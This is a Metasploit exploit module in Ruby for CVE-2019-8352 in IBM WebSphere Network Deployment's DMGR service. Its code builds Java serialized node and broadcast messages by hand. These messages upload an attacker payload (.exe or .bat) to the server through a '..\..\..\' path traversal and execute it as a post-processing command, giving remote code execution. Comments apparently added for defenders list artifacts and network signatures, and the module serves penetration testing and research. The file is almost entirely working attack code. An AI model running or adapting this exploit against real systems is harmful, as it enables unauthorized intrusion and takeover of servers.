##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Powershell
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
# Declares the module metadata (name, references, targets) and registers
# the connection options used to reach the DMGR listener.
#
# The registered defaults (SSLv3, cipher string 'ALL') describe how the
# module talks to the service; a management listener that still accepts
# that combination is worth recording on its own during an assessment.
# The vendor advisory listed under 'References' is the place to look for
# the fix.
#
# @param info [Hash] caller-supplied metadata, merged through update_info
def initialize(info = {})
  windows_binary_target = [
    'Windows Binary', {
      'Arch' => [ARCH_X86, ARCH_X64],
      'Platform' => 'win'
    }
  ]
  generic_cmd_target = [
    'CMD', {
      'Arch' => ARCH_CMD,
      'Platform' => 'win',
      'Payload' => { 'Compat' => { 'RequiredCmd' => 'generic' } }
    }
  ]

  module_info = {
    'Name' => 'IBM Websphere Application Server Network Deployment Untrusted Data Deserialization Remote Code Execution',
    'Description' => %(
      This module exploits untrusted serialized data processed by the WAS DMGR Server and Cells.
      NOTE: There is a required 2 minute timeout between attempts as the neighbor being added must be reset.
    ),
    'License' => MSF_LICENSE,
    'Author' => [
      'b0yd' # @rwincey of [Securifera](https://www.securifera.com/) / Vulnerability Discovery and MSF module author
    ],
    'References' => [
      ['CVE', '2019-8352'],
      ['URL', 'https://www-01.ibm.com/support/docview.wss?uid=ibm10883628']
    ],
    'Platform' => ['win'],
    'Targets' => [windows_binary_target, generic_cmd_target],
    'Privileged' => true,
    'DefaultTarget' => 0,
    'DisclosureDate' => 'May 15 2019'
  }
  super(update_info(info, module_info))

  connection_options = [
    Opt::RPORT(11006), # 11002,11004,11006,etc
    OptBool.new('SSL', [true, 'Negotiate SSL/TLS', true]),
    OptRaw.new('SSLVersion', [true, 'Default Version for WASND ', 'SSLv3']),
    OptRaw.new('SSLVerifyMode', [true, 'SSL verification method', 'CLIENT_ONCE']),
    OptString.new('SSLCipher', [true, 'SSL Cipher string ', 'ALL'])
  ]
  register_options(connection_options)
end
# Closes the TCP connection, reports it, then hands over to the parent
# class's cleanup.
#
# NOTE(review): the status line is printed unconditionally, so it also
# appears when no connection was ever established.
def cleanup
  disconnect
  print_status 'Disconnected from IBM Websphere DMGR.'
  super()
end
# Drives the module: connects, sends the "add neighbor" TcpNodeMessage,
# waits for one read from the socket, then sends the broadcast run-task
# message that carries the file body.
#
# Observable artifacts for defenders, all taken from the code below:
# - the written file has an 8-letter random name ending in .bat (CMD
#   target) or .exe (binary target);
# - the file name is sent with a relative prefix that climbs three
#   directories ("..\..\..\");
# - the file is registered for removal afterwards, so file-creation
#   telemetry is more useful than a later sweep of the disk.
#
# NOTE(review): the return value of sock.get_once is ignored, so
# 'Server responded' is printed even when nothing was received.
def exploit
  cmd_target = target.name == 'CMD'
  if cmd_target && !datastore['CMD']
    fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
  end
  command = cmd_target ? datastore['CMD'] : nil

  # Connect to IBM Websphere Application Server
  connect
  print_status('Connected to IBM WAS DMGR.')

  node_port = datastore['RPORT']

  # First message: register as a neighbor node
  send_msg(construct_tcp_node_msg(node_port))

  sock.get_once
  print_status('Server responded')

  # Random base name; the extension depends on the selected target
  bin_name = rand_text_alpha(8)

  if command
    payload_contents = datastore['CMD'].to_s
    print_status("Executing command: #{payload_contents}")
    extension = '.bat'
  else
    payload_contents = generate_payload_exe(code: payload.generate)
    extension = '.exe'
  end
  bin_name << extension

  print_status("Sending payload: #{bin_name}")
  relative_path = "..\\..\\..\\#{bin_name}"
  send_msg(construct_bcast_task_msg(node_port, relative_path, payload_contents, bin_name))
  register_file_for_cleanup(bin_name)
end
# Frames an encoded serialization stream and writes it to the socket.
#
# Frame layout as built here: the 32-bit big-endian constant 0x396fb74a,
# a 32-bit big-endian length equal to the stream length plus one, a
# single 0x00 byte, then the stream itself. The fixed leading constant
# is a stable value for network signatures on the DMGR ports.
#
# NOTE(review): the length uses String#length, which equals the byte
# count only for binary-encoded strings — confirm what stream.encode
# returns.
#
# @param enc_stream [String] output of Stream#encode
def send_msg(enc_stream)
  header = [0x396fb74a, enc_stream.length + 1].pack('NN')
  frame = header + "\x00" + enc_stream

  # Send msg
  sock.put(frame)
end
# Builds and encodes the first message: a TcpNodeMessage (type 12,
# source address "0.0.0.0") whose nodeProperty member is a
# P2PShimNodeProperty object.
#
# @param node_port [Integer] written into both the tcpPort and udpPort
#   members by build_tcp_node_msg
# @return [String] the encoded stream
def construct_tcp_node_msg(node_port)
  model = Rex::Java::Serialization::Model

  # Node property object; its class data is filled in by the builder
  node_property = model::NewObject.new
  node_property.class_desc = model::ClassDesc.new
  node_property.class_desc.description = build_p2p_node_class(node_property)

  # The message object that wraps the node property
  message = model::NewObject.new
  message.class_desc = model::ClassDesc.new
  message.class_desc.description = build_tcp_node_msg(message, 12, '0.0.0.0', node_port, node_property)

  # Stream layout: the object, an end-of-block marker, a null reference
  stream = model::Stream.new
  stream.contents = [
    message,
    model::EndBlockData.new,
    model::NullReference.new
  ]
  stream.encode
end
# Builds and encodes the second message: a BcastMsgRunTask (type 41,
# source address "0.0.0.0") whose task argument is an UploadFileArgument
# holding the file name, the file bytes and the post-processing command.
#
# @param node_port [Integer] written as the message's sourceUdpPort
# @param filename [String] value for the fileName member
# @param byte_str [String] file content; unpacked to unsigned byte values
# @param cmd [String] value for the postProcCmd member
# @return [String] the encoded stream
def construct_bcast_task_msg(node_port, filename, byte_str, cmd)
  model = Rex::Java::Serialization::Model

  # Upload-file argument carrying the content as an array of byte values
  upload_argument = build_upfile_arg_class(filename, byte_str.unpack('C*'), cmd)

  # The broadcast message object
  message = model::NewObject.new
  message.class_desc = model::ClassDesc.new
  message.class_desc.description = build_bcast_run_task_msg(message, 41, '0.0.0.0', node_port, upload_argument)

  # The stream holds only this object
  stream = model::Stream.new
  stream.contents = [message]
  stream.encode
end
# Describes the base class com.ibm.son.mesh.Message (fields ID, type,
# originatingCell; no superclass) and appends the matching member values
# to obj.class_data: the id, the type and a null originatingCell.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object whose
#   class_data receives the member values
# @param msg_id [Integer] value for the ID member
# @param msg_type [Integer] value for the type member
# @param orig_cell_field_type [Object] field type for originatingCell;
#   callers in this file pass either a Utf signature or a Reference
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_message(obj, msg_id, msg_type, orig_cell_field_type)
  model = Rex::Java::Serialization::Model

  # int ID
  id_field = model::Field.new.tap do |field|
    field.type = 'int'
    field.name = model::Utf.new(nil, 'ID')
  end

  # int type
  type_field = model::Field.new.tap do |field|
    field.type = 'int'
    field.name = model::Utf.new(nil, 'type')
  end

  # object originatingCell, typed by the caller
  cell_field = model::Field.new.tap do |field|
    field.type = 'object'
    field.name = model::Utf.new(nil, 'originatingCell')
    field.field_type = orig_cell_field_type
  end

  # Class description; flags 2 is SC_SERIALIZABLE in the Java stream format
  message_desc = model::NewClassDesc.new
  message_desc.class_name = model::Utf.new(nil, 'com.ibm.son.mesh.Message')
  message_desc.serial_version = 1
  message_desc.flags = 2
  message_desc.fields = [id_field, type_field, cell_field]

  # Empty annotation block
  message_desc.class_annotation = model::Annotation.new
  message_desc.class_annotation.contents = [model::EndBlockData.new]

  # No superclass
  message_desc.super_class = model::ClassDesc.new
  message_desc.super_class.description = model::NullReference.new

  # Member values, in field order
  obj.class_data << ['int', msg_id]
  obj.class_data << ['int', msg_type]
  obj.class_data << model::NullReference.new

  message_desc
end
# Describes com.ibm.son.mesh.BcastFloodMsg (fields sourceMsgID,
# sourceUdpPort, sourceIP) on top of the base Message class and appends
# its member values to obj.class_data. The same random id is used for the
# base Message ID and for sourceMsgID.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object whose
#   class_data receives the member values
# @param msg_type [Integer] passed through to build_message
# @param source_ip [String] dotted address, split on "." into byte values
# @param source_port [Integer] value for sourceUdpPort
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_bcast_flood_msg(obj, msg_type, source_ip, source_port)
  model = Rex::Java::Serialization::Model
  msg_id = Random.new.rand(4294967295)

  # originatingCell is typed through a back-reference (base handle + 1);
  # which earlier stream element that resolves to is decided at encode time
  cell_type_ref = model::Reference.new
  cell_type_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1

  # Base class first: this also appends the Message members to obj
  base_desc = build_message(obj, msg_id, msg_type, cell_type_ref)

  # int sourceMsgID
  source_id_field = model::Field.new.tap do |field|
    field.type = 'int'
    field.name = model::Utf.new(nil, 'sourceMsgID')
  end

  # int sourceUdpPort
  source_port_field = model::Field.new.tap do |field|
    field.type = 'int'
    field.name = model::Utf.new(nil, 'sourceUdpPort')
  end

  # byte[] sourceIP
  source_ip_field = model::Field.new.tap do |field|
    field.type = 'array'
    field.name = model::Utf.new(nil, 'sourceIP')
    field.field_type = model::Utf.new(nil, '[B')
  end

  # Class description
  flood_desc = model::NewClassDesc.new
  flood_desc.class_name = model::Utf.new(nil, 'com.ibm.son.mesh.BcastFloodMsg')
  flood_desc.serial_version = 1
  flood_desc.flags = 2
  flood_desc.fields = [source_id_field, source_port_field, source_ip_field]

  # Empty annotation block
  flood_desc.class_annotation = model::Annotation.new
  flood_desc.class_annotation.contents = [model::EndBlockData.new]

  # Superclass is the Message description built above
  flood_desc.super_class = model::ClassDesc.new
  flood_desc.super_class.description = base_desc

  # Address octets as a Java byte array.
  # NOTE(review): the serial literal is wider than 64 bits; presumably
  # only its low eight bytes reach the wire — confirm against
  # Builder#new_array.
  octets = source_ip.split('.').map(&:to_i)
  ip_array = Rex::Java::Serialization::Builder.new.new_array(
    values_type: 'byte',
    values: octets,
    name: '[B',
    serial: 0x42acf317f8060854e0,
    annotations: [model::EndBlockData.new]
  )

  # Member values, in field order
  obj.class_data << ['int', msg_id]
  obj.class_data << ['int', source_port]
  obj.class_data << ip_array

  flood_desc
end
# Describes com.ibm.son.mesh.TcpNodeMessage (fields bootTime, tcpPort,
# udpPort, ip, nodeProperty) on top of the base Message class and appends
# its member values to obj.class_data. bootTime is written as 0 and
# source_port is written to both port members.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object whose
#   class_data receives the member values
# @param msg_type [Integer] passed through to build_message
# @param source_ip [String] dotted address, split on "." into byte values
# @param source_port [Integer] value for tcpPort and udpPort
# @param p2p_obj [Rex::Java::Serialization::Model::NewObject] value for
#   the nodeProperty member
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_tcp_node_msg(obj, msg_type, source_ip, source_port, p2p_obj)
  model = Rex::Java::Serialization::Model
  msg_id = Random.new.rand(4294967295)

  # originatingCell is declared as a String here
  cell_type = model::Utf.new(nil, 'Ljava/lang/String;')
  base_desc = build_message(obj, msg_id, msg_type, cell_type)

  # long bootTime
  boot_time_field = model::Field.new.tap do |field|
    field.type = 'long'
    field.name = model::Utf.new(nil, 'bootTime')
  end

  # int tcpPort
  tcp_port_field = model::Field.new.tap do |field|
    field.type = 'int'
    field.name = model::Utf.new(nil, 'tcpPort')
  end

  # int udpPort
  udp_port_field = model::Field.new.tap do |field|
    field.type = 'int'
    field.name = model::Utf.new(nil, 'udpPort')
  end

  # byte[] ip
  ip_field = model::Field.new.tap do |field|
    field.type = 'array'
    field.name = model::Utf.new(nil, 'ip')
    field.field_type = model::Utf.new(nil, '[B')
  end

  # AppLevelNodeProperty nodeProperty
  node_property_field = model::Field.new.tap do |field|
    field.type = 'object'
    field.name = model::Utf.new(nil, 'nodeProperty')
    field.field_type = model::Utf.new(nil, 'Lcom/ibm/son/mesh/AppLevelNodeProperty;')
  end

  # Class description
  node_msg_desc = model::NewClassDesc.new
  node_msg_desc.class_name = model::Utf.new(nil, 'com.ibm.son.mesh.TcpNodeMessage')
  node_msg_desc.serial_version = 1
  node_msg_desc.flags = 2
  node_msg_desc.fields = [
    boot_time_field,
    tcp_port_field,
    udp_port_field,
    ip_field,
    node_property_field
  ]

  # Empty annotation block
  node_msg_desc.class_annotation = model::Annotation.new
  node_msg_desc.class_annotation.contents = [model::EndBlockData.new]

  # Superclass is the Message description built above
  node_msg_desc.super_class = model::ClassDesc.new
  node_msg_desc.super_class.description = base_desc

  # Address octets as a Java byte array.
  # NOTE(review): the serial literal is wider than 64 bits; presumably
  # only its low eight bytes reach the wire — confirm against
  # Builder#new_array.
  octets = source_ip.split('.').map(&:to_i)
  ip_array = Rex::Java::Serialization::Builder.new.new_array(
    values_type: 'byte',
    values: octets,
    name: '[B',
    serial: 0x42acf317f8060854e0,
    annotations: [model::EndBlockData.new]
  )

  # Member values, in field order
  obj.class_data << ['long', 0]
  obj.class_data << ['int', source_port]
  obj.class_data << ['int', source_port]
  obj.class_data << ip_array
  obj.class_data << p2p_obj

  node_msg_desc
end
# Describes com.ibm.son.mesh.AppLevelNodeProperty (fields
# structuredGateway, version, bridgedCellsList, cellName; no superclass)
# and appends its member values to obj.class_data: false, 0, a null list
# and a random decimal string as the cell name.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object whose
#   class_data receives the member values
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_app_node_class(obj)
  model = Rex::Java::Serialization::Model

  # boolean structuredGateway
  gateway_field = model::Field.new.tap do |field|
    field.type = 'boolean'
    field.name = model::Utf.new(nil, 'structuredGateway')
  end

  # int version
  version_field = model::Field.new.tap do |field|
    field.type = 'int'
    field.name = model::Utf.new(nil, 'version')
  end

  # java.util.List bridgedCellsList
  bridged_cells_field = model::Field.new.tap do |field|
    field.type = 'object'
    field.name = model::Utf.new(nil, 'bridgedCellsList')
    field.field_type = model::Utf.new(nil, 'Ljava/util/List;')
  end

  # cellName is typed through a back-reference (base handle + 4)
  cell_name_type_ref = model::Reference.new
  cell_name_type_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 4

  cell_name_field = model::Field.new.tap do |field|
    field.type = 'object'
    field.name = model::Utf.new(nil, 'cellName')
    field.field_type = cell_name_type_ref
  end

  # Class description
  app_node_desc = model::NewClassDesc.new
  app_node_desc.class_name = model::Utf.new(nil, 'com.ibm.son.mesh.AppLevelNodeProperty')
  app_node_desc.serial_version = 1
  app_node_desc.flags = 2
  app_node_desc.fields = [
    gateway_field,
    version_field,
    bridged_cells_field,
    cell_name_field
  ]

  # Empty annotation block
  app_node_desc.class_annotation = model::Annotation.new
  app_node_desc.class_annotation.contents = [model::EndBlockData.new]

  # No superclass
  app_node_desc.super_class = model::ClassDesc.new
  app_node_desc.super_class.description = model::NullReference.new

  # Member values, in field order
  obj.class_data << ['boolean', 0]
  obj.class_data << ['int', 0]
  obj.class_data << model::NullReference.new
  obj.class_data << model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name

  app_node_desc
end
# Describes java.util.Hashtable (fields loadFactor and threshold; no
# superclass) and appends its member values to obj.class_data: load
# factor 0.75, threshold 8 and an 8-byte data block.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object whose
#   class_data receives the member values
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_hashtable_class(obj)
  model = Rex::Java::Serialization::Model

  # float loadFactor
  load_factor_field = model::Field.new.tap do |field|
    field.type = 'float'
    field.name = model::Utf.new(nil, 'loadFactor')
  end

  # int threshold
  threshold_field = model::Field.new.tap do |field|
    field.type = 'int'
    field.name = model::Utf.new(nil, 'threshold')
  end

  # Class description; flags 3 is SC_SERIALIZABLE | SC_WRITE_METHOD in
  # the Java stream format
  hashtable_desc = model::NewClassDesc.new
  hashtable_desc.class_name = model::Utf.new(nil, 'java.util.Hashtable')
  hashtable_desc.serial_version = 0x13BB0F25214AE4B8
  hashtable_desc.flags = 3
  hashtable_desc.fields = [load_factor_field, threshold_field]

  # Empty annotation block
  hashtable_desc.class_annotation = model::Annotation.new
  hashtable_desc.class_annotation.contents = [model::EndBlockData.new]

  # No superclass
  hashtable_desc.super_class = model::ClassDesc.new
  hashtable_desc.super_class.description = model::NullReference.new

  # Member values. The block holds two big-endian ints, 11 and 3 —
  # presumably table capacity and entry count; verify against the
  # key/value strings the caller appends afterwards.
  obj.class_data << ['float', 0.75]
  obj.class_data << ['int', 8]
  obj.class_data << model::BlockData.new(nil, "\x00\x00\x00\x0b\x00\x00\x00\x03")

  hashtable_desc
end
# Builds a complete java.util.Properties object (superclass
# java.util.Hashtable) holding six strings: 'memberName' and a random
# decimal string, 'inOdc' and '0', 'epoch' and the current time in
# milliseconds.
#
# @return [Rex::Java::Serialization::Model::NewObject]
def build_properties_class
  model = Rex::Java::Serialization::Model

  # The object under construction
  properties = model::NewObject.new
  properties.class_desc = model::ClassDesc.new

  # Superclass description; this also appends the Hashtable members
  hashtable_desc = build_hashtable_class(properties)

  # 'defaults' is typed through a back-reference (base handle + 9)
  defaults_type_ref = model::Reference.new
  defaults_type_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 9

  defaults_field = model::Field.new.tap do |field|
    field.type = 'object'
    field.name = model::Utf.new(nil, 'defaults')
    field.field_type = defaults_type_ref
  end

  # Class description
  properties_desc = model::NewClassDesc.new
  properties_desc.class_name = model::Utf.new(nil, 'java.util.Properties')
  properties_desc.serial_version = 0x3912D07A70363E98
  properties_desc.flags = 2
  properties_desc.fields = [defaults_field]

  # Empty annotation block
  properties_desc.class_annotation = model::Annotation.new
  properties_desc.class_annotation.contents = [model::EndBlockData.new]

  # Superclass is the Hashtable description built above
  properties_desc.super_class = model::ClassDesc.new
  properties_desc.super_class.description = hashtable_desc

  properties.class_desc.description = properties_desc

  # Strings appended in key, value order
  properties.class_data << model::Utf.new(nil, 'memberName')
  properties.class_data << model::Utf.new(nil, rand(0xffffffffffff).to_s) # Cell Name
  properties.class_data << model::Utf.new(nil, 'inOdc')
  properties.class_data << model::Utf.new(nil, '0')
  properties.class_data << model::Utf.new(nil, 'epoch')
  properties.class_data << model::Utf.new(nil, (Time.now.to_f * 1000).to_i.to_s)

  properties
end
# Describes com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty (fields data and
# properties) on top of AppLevelNodeProperty and appends its member
# values to obj.class_data: an empty byte array and a Properties object.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object whose
#   class_data receives the member values
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_p2p_node_class(obj)
  model = Rex::Java::Serialization::Model

  # Superclass first: this also appends the AppLevelNodeProperty members
  app_node_desc = build_app_node_class(obj)

  # 'data' is typed through a back-reference (base handle + 1)
  data_type_ref = model::Reference.new
  data_type_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 1

  data_field = model::Field.new.tap do |field|
    field.type = 'array'
    field.name = model::Utf.new(nil, 'data')
    field.field_type = data_type_ref
  end

  # java.util.Properties properties
  properties_field = model::Field.new.tap do |field|
    field.type = 'object'
    field.name = model::Utf.new(nil, 'properties')
    field.field_type = model::Utf.new(nil, 'Ljava/util/Properties;')
  end

  # Class description
  p2p_desc = model::NewClassDesc.new
  p2p_desc.class_name = model::Utf.new(nil, 'com.ibm.ws.wsgroup.p2p.P2PShimNodeProperty')
  p2p_desc.serial_version = 2
  p2p_desc.flags = 2
  p2p_desc.fields = [data_field, properties_field]

  # Empty annotation block
  p2p_desc.class_annotation = model::Annotation.new
  p2p_desc.class_annotation.contents = [model::EndBlockData.new]

  # Superclass is the AppLevelNodeProperty description built above
  p2p_desc.super_class = model::ClassDesc.new
  p2p_desc.super_class.description = app_node_desc

  # The array's class description is a back-reference (base handle + 6)
  array_desc_ref = model::Reference.new
  array_desc_ref.handle = Rex::Java::Serialization::BASE_WIRE_HANDLE + 6

  # Empty byte array for the 'data' member
  empty_data = model::NewArray.new
  empty_data.array_description = model::ClassDesc.new
  empty_data.array_description.description = array_desc_ref
  empty_data.type = 'byte'
  empty_data.values = []

  # Member values, in field order
  obj.class_data << empty_data
  obj.class_data << build_properties_class

  p2p_desc
end
# Builds a complete com.ibm.son.plugin.UploadFileArgument object (fields
# fileBody, fileName, postProcCmd; no superclass) from the given values.
#
# The class name and the three field names are fixed strings in the
# serialized stream, which makes them usable as content signatures when
# inspecting traffic to the DMGR ports.
#
# @param filename [String] value for the fileName member
# @param bytes [Array<Integer>] byte values for the fileBody member
# @param cmd [String] value for the postProcCmd member
# @return [Rex::Java::Serialization::Model::NewObject]
def build_upfile_arg_class(filename, bytes, cmd)
  model = Rex::Java::Serialization::Model
  base_handle = Rex::Java::Serialization::BASE_WIRE_HANDLE

  # fileName is typed through a back-reference (base handle + 1)
  name_type_ref = model::Reference.new
  name_type_ref.handle = base_handle + 1

  filename_field = model::Field.new.tap do |field|
    field.type = 'object'
    field.name = model::Utf.new(nil, 'fileName')
    field.field_type = name_type_ref
  end

  # fileBody is typed through a back-reference (base handle + 4)
  body_type_ref = model::Reference.new
  body_type_ref.handle = base_handle + 4

  filebody_field = model::Field.new.tap do |field|
    field.type = 'array'
    field.name = model::Utf.new(nil, 'fileBody')
    field.field_type = body_type_ref
  end

  # postProcCmd is typed through a back-reference (base handle + 1)
  cmd_type_ref = model::Reference.new
  cmd_type_ref.handle = base_handle + 1

  post_cmd_field = model::Field.new.tap do |field|
    field.type = 'object'
    field.name = model::Utf.new(nil, 'postProcCmd')
    field.field_type = cmd_type_ref
  end

  # Class description; the body field is declared first
  upload_desc = model::NewClassDesc.new
  upload_desc.class_name = model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileArgument')
  upload_desc.serial_version = 1
  upload_desc.flags = 2
  upload_desc.fields = [filebody_field, filename_field, post_cmd_field]

  # Empty annotation block
  upload_desc.class_annotation = model::Annotation.new
  upload_desc.class_annotation.contents = [model::EndBlockData.new]

  # No superclass
  upload_desc.super_class = model::ClassDesc.new
  upload_desc.super_class.description = model::NullReference.new

  # The array's class description is a back-reference (base handle + 7)
  array_desc_ref = model::Reference.new
  array_desc_ref.handle = base_handle + 7

  # File content as a byte array
  file_body = model::NewArray.new
  file_body.array_description = model::ClassDesc.new
  file_body.array_description.description = array_desc_ref
  file_body.type = 'byte'
  file_body.values = bytes

  # Assemble the object; member values follow the field order
  upload_argument = model::NewObject.new
  upload_argument.class_desc = model::ClassDesc.new
  upload_argument.class_desc.description = upload_desc
  upload_argument.class_data << file_body
  upload_argument.class_data << model::Utf.new(nil, filename)
  upload_argument.class_data << model::Utf.new(nil, cmd)

  upload_argument
end
# Describes com.ibm.son.plugin.BcastMsgRunTask (fields
# forwardGatheredDataPipelinePeriod, outputGatherInterval, task,
# taskArgument) on top of BcastFloodMsg and appends its member values to
# obj.class_data: 0, 1, the task class name
# 'com.ibm.son.plugin.UploadFileToAllNodes' and the upload argument.
#
# @param obj [Rex::Java::Serialization::Model::NewObject] object whose
#   class_data receives the member values
# @param msg_type [Integer] passed through to build_bcast_flood_msg
# @param source_ip [String] passed through to build_bcast_flood_msg
# @param source_port [Integer] passed through to build_bcast_flood_msg
# @param upfile_arg_obj [Rex::Java::Serialization::Model::NewObject]
#   value for the taskArgument member
# @return [Rex::Java::Serialization::Model::NewClassDesc]
def build_bcast_run_task_msg(obj, msg_type, source_ip, source_port, upfile_arg_obj)
  model = Rex::Java::Serialization::Model

  # Superclass first: this also appends the inherited members to obj
  flood_desc = build_bcast_flood_msg(obj, msg_type, source_ip, source_port)

  # int outputGatherInterval
  gather_interval_field = model::Field.new.tap do |field|
    field.type = 'int'
    field.name = model::Utf.new(nil, 'outputGatherInterval')
  end

  # String task
  task_field = model::Field.new.tap do |field|
    field.type = 'object'
    field.name = model::Utf.new(nil, 'task')
    field.field_type = model::Utf.new(nil, 'Ljava/lang/String;')
  end

  # Serializable taskArgument
  task_argument_field = model::Field.new.tap do |field|
    field.type = 'object'
    field.name = model::Utf.new(nil, 'taskArgument')
    field.field_type = model::Utf.new(nil, 'Ljava/io/Serializable;')
  end

  # int forwardGatheredDataPipelinePeriod
  pipeline_period_field = model::Field.new.tap do |field|
    field.type = 'int'
    field.name = model::Utf.new(nil, 'forwardGatheredDataPipelinePeriod')
  end

  # Class description; the pipeline period is declared first
  run_task_desc = model::NewClassDesc.new
  run_task_desc.class_name = model::Utf.new(nil, 'com.ibm.son.plugin.BcastMsgRunTask')
  run_task_desc.serial_version = 1
  run_task_desc.flags = 2
  run_task_desc.fields = [
    pipeline_period_field,
    gather_interval_field,
    task_field,
    task_argument_field
  ]

  # Empty annotation block
  run_task_desc.class_annotation = model::Annotation.new
  run_task_desc.class_annotation.contents = [model::EndBlockData.new]

  # Superclass is the BcastFloodMsg description built above
  run_task_desc.super_class = model::ClassDesc.new
  run_task_desc.super_class.description = flood_desc

  # Member values, in field order
  obj.class_data << ['int', 0]
  obj.class_data << ['int', 1]
  obj.class_data << model::Utf.new(nil, 'com.ibm.son.plugin.UploadFileToAllNodes')
  obj.class_data << upfile_arg_obj

  run_task_desc
end
end |